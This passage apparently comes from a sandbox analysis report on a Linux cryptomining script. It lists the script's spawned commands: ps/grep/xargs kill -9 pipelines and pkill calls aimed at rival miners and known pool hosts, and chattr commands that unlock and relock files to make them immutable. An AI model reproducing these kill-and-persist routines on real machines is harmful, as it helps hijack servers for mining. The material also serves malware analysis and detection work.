  2⤵
  PID:2240
- /bin/grep
  grep -v grep
  2⤵
  PID:2239
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2238
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:2247
- /bin/grep
  grep "]"
  2⤵
  PID:2246
- /bin/grep
  grep -v aux
  2⤵
  PID:2245
- /bin/grep
  grep -v grep
  2⤵
  PID:2244
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2248
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2243
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2253
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2252
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:2251
- /bin/grep
  grep -v grep
  2⤵
  PID:2250
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2249
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2258
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2257
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:2256
- /bin/grep
  grep -v grep
  2⤵
  PID:2255
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2254
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2263
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2262
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:2261
- /bin/grep
  grep -v grep
  2⤵
  PID:2260
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2259
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2270
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:2269
- /bin/grep
  grep -v _
  2⤵
  PID:2268
- /bin/grep
  grep -v -
  2⤵
  PID:2267
- /bin/grep
  grep -v /
  2⤵
  PID:2266
- /bin/grep
  grep -v grep
  2⤵
  PID:2265
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2264
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2275
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2274
- /bin/grep
  grep "\\[^"
  2⤵
  PID:2273
- /bin/grep
  grep -v grep
  2⤵
  PID:2272
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2271
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2280
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2279
- /bin/grep
  grep rsync
  2⤵
  PID:2278
- /bin/grep
  grep -v grep
  2⤵
  PID:2277
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2276
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2285
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2284
- /bin/grep
  grep watchd0g
  2⤵
  PID:2283
- /bin/grep
  grep -v grep
  2⤵
  PID:2282
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2281
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2290
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2289
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2288
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2288
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2288
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2288
- /bin/grep
  grep -v grep
  2⤵
  PID:2287
- /bin/ps
  ps aux
  2⤵
  PID:2286
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2288
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2288
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2288
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2295
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2294
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  - Disables SELinux
  PID:2293
- /bin/grep
  grep -v grep
  2⤵
  PID:2292
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2291
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2300
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2299
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2298
- /bin/grep
  grep -v grep
  2⤵
  PID:2297
- /bin/ps
  ps aux
  2⤵
  PID:2296
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2305
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2304
- /bin/grep
  grep gitee.com
  2⤵
  PID:2303
- /bin/grep
  grep -v grep
  2⤵
  PID:2302
- /bin/ps
  ps aux
  2⤵
  PID:2301
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2310
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2309
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2308
- /bin/grep
  grep -v grep
  2⤵
  PID:2307
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2306
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2315
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2314
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:2313
- /bin/grep
  grep -v grep
  2⤵
  PID:2312
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2311
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2320
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2319
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:2318
- /bin/grep
  grep -v grep
  2⤵
  PID:2317
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2316
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2325
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2324
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:2323
- /bin/grep
  grep -v grep
  2⤵
  PID:2322
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2321
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2330
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2329
- /bin/grep
  grep kthrotlds
  2⤵
  PID:2328
- /bin/grep
  grep -v grep
  2⤵
  PID:2327
- /bin/ps
  ps aux
  2⤵
  PID:2326
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2335
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2334
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:2333
- /bin/grep
  grep -v grep
  2⤵
  PID:2332
- /bin/ps
  ps aux
  2⤵
  PID:2331
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2340
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2339
- /bin/grep
  grep netdns
  2⤵
  PID:2338
- /bin/grep
  grep -v grep
  2⤵
  PID:2337
- /bin/ps
  ps aux
  2⤵
  PID:2336
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2345
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2344
- /bin/grep
  grep watchdogs
  2⤵
  PID:2343
- /bin/grep
  grep -v grep
  2⤵
  PID:2342
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2341
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2350
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2349
- /bin/grep
  grep kdevtmpfsi
  2⤵
  PID:2348
- /bin/grep
  grep -v grep
  2⤵
  PID:2347
- /bin/ps
  ps aux
  2⤵
  PID:2346
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2355
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2354
- /bin/grep
  grep kinsing
  2⤵
  PID:2353
- /bin/grep
  grep -v grep
  2⤵
  PID:2352
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2351
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2360
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2359
- /bin/grep
  grep redis2
  2⤵
  PID:2358
- /bin/grep
  grep -v grep
  2⤵
  PID:2357
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2356
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2366
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2365
- /bin/grep
  grep " ps"
  2⤵
  PID:2364
- /bin/grep
  grep -v aux
  2⤵
  PID:2363
- /bin/grep
  grep -v grep
  2⤵
  PID:2362
- /bin/ps
  ps aux
  2⤵
  PID:2361
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2371
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2370
- /bin/grep
  grep sync_supers
  2⤵
  PID:2369
- /bin/grep
  grep -v grep
  2⤵
  PID:2368
- /bin/ps
  ps aux
  2⤵
  PID:2367
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2376
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2375
- /bin/grep
  grep cpuset
  2⤵
  PID:2374
- /bin/grep
  grep -v grep
  2⤵
  PID:2373
- /bin/ps
  ps aux
  2⤵
  PID:2372
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2382
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2381
- /bin/grep
  grep "x]"
  2⤵
  PID:2380
- /bin/grep
  grep -v aux
  2⤵
  PID:2379
- /bin/grep
  grep -v grep
  2⤵
  PID:2378
- /bin/ps
  ps aux
  2⤵
  PID:2377
- /bin/grep
  grep curl
  2⤵
  PID:2459
- /bin/grep
  grep mr.sh
  2⤵
  PID:2458
- /bin/grep
  grep -v grep
  2⤵
  PID:2457
- /bin/ps
  ps aux
  2⤵
  PID:2456
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2467
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2466
- /bin/grep
  grep wget
  2⤵
  PID:2465
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2464
- /bin/grep
  grep -v grep
  2⤵
  PID:2463
- /bin/ps
  ps aux
  2⤵
  PID:2462
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2472
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2473
- /bin/grep
  grep curl
  2⤵
  PID:2471
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2470
- /bin/grep
  grep -v grep
  2⤵
  PID:2469
- /bin/ps
  ps aux
  2⤵
  PID:2468
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2479
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2478
- /bin/grep
  grep wget
  2⤵
  PID:2477
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2476
- /bin/grep
  grep -v grep
  2⤵
  PID:2475
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2474
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2485
- /bin/grep
  grep curl
  2⤵
  PID:2483
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2482
- /bin/grep
  grep -v grep
  2⤵
  PID:2481
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2480
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2484
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2491
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2490
- /bin/grep
  grep wget
  2⤵
  PID:2489
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2488
- /bin/grep
  grep -v grep
  2⤵
  PID:2487
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2486
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2497
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2496
- /bin/grep
  grep curl
  2⤵
  PID:2495
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2494
- /bin/grep
  grep -v grep
  2⤵
  PID:2493
- /bin/ps
  ps aux
  2⤵
  PID:2492
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2502
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2501
- /bin/grep
  grep j2.conf
  2⤵
  PID:2500
- /bin/grep
  grep -v grep
  2⤵
  PID:2499
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2498
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2508
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2507
- /bin/grep
  grep wget
  2⤵
  PID:2506
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2505
- /bin/grep
  grep -v grep
  2⤵
  PID:2504
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2503
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2514
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2513
- /bin/grep
  grep curl
  2⤵
  PID:2512
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2511
- /bin/grep
  grep -v grep
  2⤵
  PID:2510
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2509
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2520
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2519
- /bin/grep
  grep wget
  2⤵
  PID:2518
- /bin/grep
  grep ficov
  2⤵
  PID:2517
- /bin/grep
  grep -v grep
  2⤵
  PID:2516
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2515
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2526
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2525
- /bin/grep
  grep curl
  2⤵
  PID:2524
- /bin/grep
  grep ficov
  2⤵
  PID:2523
- /bin/grep
  grep -v grep
  2⤵
  PID:2522
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2521
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2532
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2531
- /bin/grep
  grep wget
  2⤵
  PID:2530
- /bin/grep
  grep he.sh
  2⤵
  PID:2529
- /bin/grep
  grep -v grep
  2⤵
  PID:2528
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2527
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2538
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2537
- /bin/grep
  grep curl
  2⤵
  PID:2536
- /bin/grep
  grep he.sh
  2⤵
  PID:2535
- /bin/grep
  grep -v grep
  2⤵
  PID:2534
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2533
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2544
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2543
- /bin/grep
  grep wget
  2⤵
  PID:2542
- /bin/grep
  grep miner.sh
  2⤵
  PID:2541
- /bin/grep
  grep -v grep
  2⤵
  PID:2540
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2539
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2550
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2549
- /bin/grep
  grep curl
  2⤵
  PID:2548
- /bin/grep
  grep miner.sh
  2⤵
  PID:2547
- /bin/grep
  grep -v grep
  2⤵
  PID:2546
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2545
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2556
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2555
- /bin/grep
  grep nullcrew
  2⤵
  PID:2553
- /bin/grep
  grep wget
  2⤵
  PID:2554
- /bin/grep
  grep -v grep
  2⤵
  PID:2552
- /bin/ps
  ps aux
  2⤵
  PID:2551
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2562
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2561
- /bin/grep
  grep curl
  2⤵
  PID:2560
- /bin/grep
  grep nullcrew
  2⤵
  PID:2559
- /bin/grep
  grep -v grep
  2⤵
  PID:2558
- /bin/ps
  ps aux
  2⤵
  PID:2557
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2567
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2566
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:2565
- /bin/grep
  grep -v grep
  2⤵
  PID:2564
- /bin/ps
  ps aux
  2⤵
  PID:2563
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2572
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2571
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:2570
- /bin/grep
  grep -v grep
  2⤵
  PID:2569
- /bin/ps
  ps aux
  2⤵
  PID:2568
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2577
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2576
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:2575
- /bin/grep
  grep -v grep
  2⤵
  PID:2574
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2573
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2586
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2585
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:2584
- /bin/grep
  grep -v grep
  2⤵
  PID:2583
- /bin/ps
  ps aux
  2⤵
  PID:2582
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2595
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2594
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:2593
- /bin/grep
  grep -v grep
  2⤵
  PID:2592
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2591
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2600
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2599
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:2598
- /bin/grep
  grep -v grep
  2⤵
  PID:2597
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2596
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2605
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2604
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:2603
- /bin/grep
  grep -v grep
  2⤵
  PID:2602
- /bin/ps
  ps auxf
  2⤵
  PID:2601
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2610
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2609
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:2608
- /bin/grep
  grep -v grep
  2⤵
  PID:2607
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2606
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2615
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2614
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:2613
- /bin/grep
  grep -v grep
  2⤵
  PID:2612
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2611
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2620
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2619
- /bin/grep
  grep monerohash.com
  2⤵
  PID:2618
- /bin/grep
  grep -v grep
  2⤵
  PID:2617
- /bin/ps
  ps auxf
  2⤵
  PID:2616
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2625
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2624
- /usr/bin/pkill
  pkill -f lx26
  2⤵
  PID:2791
- /usr/bin/pkill
  pkill -f NXLAi
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2792
- /usr/bin/pkill
  pkill -f BI5zj
  2⤵
  - Reads CPU attributes
  PID:2793
- /usr/bin/pkill
  pkill -f askdljlqw
  2⤵
  - Reads runtime system information
  PID:2794
- /usr/bin/pkill
  pkill -f minerd
  2⤵
  PID:2795
- /usr/bin/pkill
  pkill -f minergate
  2⤵
  PID:2796
- /usr/bin/pkill
  pkill -f Guard.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2797
- /usr/bin/pkill
  pkill -f ysaydh
  2⤵
  - Reads CPU attributes
  PID:2798
- /usr/bin/pkill
  pkill -f bonns
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2799
- /usr/bin/pkill
  pkill -f donns
  2⤵
  - Reads CPU attributes
  PID:2800
- /usr/bin/pkill
  pkill -f kxjd
  2⤵
  PID:2801
- /usr/bin/pkill
  pkill -f Duck.sh
  2⤵
  PID:2802
- /usr/bin/pkill
  pkill -f bonn.sh
  2⤵
  - Reads CPU attributes
  PID:2803
- /usr/bin/pkill
  pkill -f conn.sh
  2⤵
  PID:2804
- /usr/bin/pkill
  pkill -f kworker34
  2⤵
  PID:2805
- /usr/bin/pkill
  pkill -f kw.sh
  2⤵
  - Reads CPU attributes
  PID:2806
- /usr/bin/pkill
  pkill -f pro.sh
  2⤵
  PID:2807
- /usr/bin/pkill
  pkill -f polkitd
  2⤵
  PID:2808
- /usr/bin/pkill
  pkill -f acpid
  2⤵
  - Reads CPU attributes
  PID:2809
- /usr/bin/pkill
  pkill -f icb5o
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2810
- /usr/bin/pkill
  pkill -f nopxi
  2⤵
  PID:2811
- /usr/bin/pkill
  pkill -f irqbalanc1
  2⤵
  PID:2812
- /usr/bin/pkill
  pkill -f minerd
  2⤵
  PID:2813
- /usr/bin/pkill
  pkill -f i586
  2⤵
  PID:2814
- /usr/bin/pkill
  pkill -f gddr
  2⤵
  - Reads runtime system information
  PID:2815
- /usr/bin/pkill
  pkill -f mstxmr
  2⤵
  - Reads CPU attributes
  PID:2816
- /usr/bin/pkill
  pkill -f ddg.2011
  2⤵
  PID:2817
- /usr/bin/pkill
  pkill -f wnTKYg
  2⤵
  - Reads CPU attributes
  PID:2818
- /usr/bin/pkill
  pkill -f deamon
  2⤵
  PID:2819
- /usr/bin/pkill
  pkill -f disk_genius
  2⤵
  PID:2820
- /usr/bin/pkill
  pkill -f sourplum
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2821
- /usr/bin/pkill
  pkill -f polkitd
  2⤵
  PID:2822
- /usr/bin/pkill
  pkill -f nanoWatch
  2⤵
  PID:2823
- /usr/bin/pkill
  pkill -f zigw
  2⤵
  - Reads CPU attributes
  PID:2824
- /usr/bin/pkill
  pkill -f devtool
  2⤵
  PID:2825
- /usr/bin/pkill
  pkill -f devtools
  2⤵
  PID:2826
- /usr/bin/pkill
  pkill -f systemctI
  2⤵
  PID:2827
- /usr/bin/pkill
  pkill -f watchbog
  2⤵
  PID:2828
- /usr/bin/pkill
  pkill -f sustes
  2⤵
  - Reads CPU attributes
  PID:2829
- /usr/bin/pkill
  pkill -f xmrig
  2⤵
  PID:2830
- /usr/bin/pkill
  pkill -f xmrig-cpu
  2⤵
  PID:2831
- /usr/bin/pkill
  pkill -f 121.42.151.137
  2⤵
  - Reads runtime system information
  PID:2832
- /usr/bin/pkill
  pkill -f init12.cfg
  2⤵
  - Reads runtime system information
  PID:2833
- /usr/bin/pkill
  pkill -f nginxk
  2⤵
  - Reads CPU attributes
  PID:2834
- /usr/bin/pkill
  pkill -f tmp/wc.conf
  2⤵
  - Reads CPU attributes
  PID:2835
- /usr/bin/pkill
  pkill -f xmrig-notls
  2⤵
  - Reads CPU attributes
  PID:2836
- /usr/bin/pkill
  pkill -f xmr-stak
  2⤵
  - Reads runtime system information
  PID:2837
- /usr/bin/pkill
  pkill -f suppoie
  2⤵
  PID:2838
- /usr/bin/pkill
  pkill -f zer0day.ru
  2⤵
  - Reads CPU attributes
  PID:2839
- /usr/bin/pkill
  pkill -f dbus-daemon--system
  2⤵
  - Reads CPU attributes
  PID:2840
- /usr/bin/pkill
  pkill -f nullcrew
  2⤵
  - Reads CPU attributes
  PID:2841
- /usr/bin/pkill
  pkill -f systemctI
  2⤵
  PID:2842
- /usr/bin/pkill
  pkill -f kworkerds
  2⤵
  - Reads CPU attributes
  PID:2843
- /usr/bin/pkill
  pkill -f init10.cfg
  2⤵
  PID:2844
- /usr/bin/pkill
  pkill -f /wl.conf
  2⤵
  PID:2845
- /usr/bin/pkill
  pkill -f crond64
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2846
- /usr/bin/pkill
  pkill -f sustse
  2⤵
  PID:2847
- /usr/bin/pkill
  pkill -f vmlinuz
  2⤵
  - Reads runtime system information
  PID:2848
- /usr/bin/chattr
  chattr -i /tmp/kdevtmpfsi
  2⤵
  - Attempts to change immutable files
  PID:3003
- /usr/bin/chattr
  chattr +i /tmp/kdevtmpfsi
  2⤵
  PID:3004
- /bin/sleep
  sleep 1
  2⤵
  PID:3005
- /usr/bin/chattr
  chattr -i /tmp/redis2
  2⤵
  PID:3006
- /usr/bin/chattr
  chattr +i /tmp/redis2
  2⤵
  PID:3007
- /usr/bin/chattr
  chattr -ia /.Xll/xr
  2⤵
  - Attempts to change immutable files
  PID:3008
- /usr/bin/chattr
  chattr +ia /.Xll/xr
  2⤵
  PID:3009
- /usr/bin/chattr
  chattr -ia /etc/trace
  2⤵
  PID:3010
- /usr/bin/chattr
  chattr +ia /etc/trace
  2⤵
  - Attempts to change immutable files
  PID:3011
- /usr/bin/chattr
  chattr -ia /etc/newsvc.sh
  2⤵
  PID:3012
- /usr/bin/chattr
  chattr -ia "/etc/svc*"
  2⤵
  - Attempts to change immutable files
  PID:3013
- /usr/bin/chattr
  chattr -ia /tmp/newsvc.sh
  2⤵
  PID:3014
- /usr/bin/chattr
  chattr -ia "/tmp/svc*"
  2⤵
  - Attempts to change immutable files
  PID:3015
- /usr/bin/chattr
  chattr +ia /etc/newsvc.sh
  2⤵
  PID:3016
- /usr/bin/chattr
  chattr +ia /etc/svcguard /etc/svcupdate /etc/svcupdates /etc/svcworkmanager
  2⤵
  PID:3017
- /usr/bin/chattr
  chattr +ia /tmp/newsvc.sh
  2⤵
  - Attempts to change immutable files
  PID:3018
- /usr/bin/chattr
  chattr +ia /tmp/svcguard /tmp/svcupdate /tmp/svcupdates /tmp/svcworkmanager
  2⤵
  PID:3019
- /bin/sleep
  sleep 1
  2⤵
  PID:3020
- /usr/bin/chattr
  chattr -ia /etc/phpupdate
  2⤵
  - Attempts to change immutable files
  PID:3021
- /usr/bin/chattr
  chattr -ia /etc/phpguard
  2⤵
  PID:3022
- /usr/bin/chattr
  chattr -ia /etc/networkmanager
  2⤵
  - Attempts to change immutable files
  PID:3023
- /usr/bin/chattr
  chattr -ia /etc/newdat.sh
  2⤵
  PID:3024
- /usr/bin/chattr
  chattr +ia /etc/phpupdate
  2⤵
  PID:3025
- /usr/bin/chattr
  chattr +ia /etc/phpguard
  2⤵
  PID:3026
- /usr/bin/chattr
  chattr +ia /etc/networkmanager
  2⤵
  - Attempts to change immutable files
  PID:3027
- /usr/bin/chattr
  chattr +ia /etc/newdat.sh
  2⤵
  PID:3028
- /usr/bin/chattr
  chattr -ia /etc/zzh
  2⤵
  - Attempts to change immutable files
  PID:3029
- /usr/bin/chattr
  chattr -ia /etc/newinit
  2⤵
  PID:3030
- /usr/bin/chattr
  chattr +ia /etc/zzh
  2⤵
  - Attempts to change immutable files
  PID:3031
- /usr/bin/chattr
  chattr +ia /etc/newinit
  2⤵
  - Attempts to change immutable files
  PID:3032
- /bin/sleep
  sleep 1
  2⤵
  PID:3033
- /usr/bin/chattr
  chattr -i /usr/lib/systemd/systemd-update-daily
  2⤵
  PID:3034
- /usr/bin/chattr
  chattr +i /usr/lib/systemd/systemd-update-daily
  2⤵
  PID:3035
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:3038
- /usr/bin/xargs
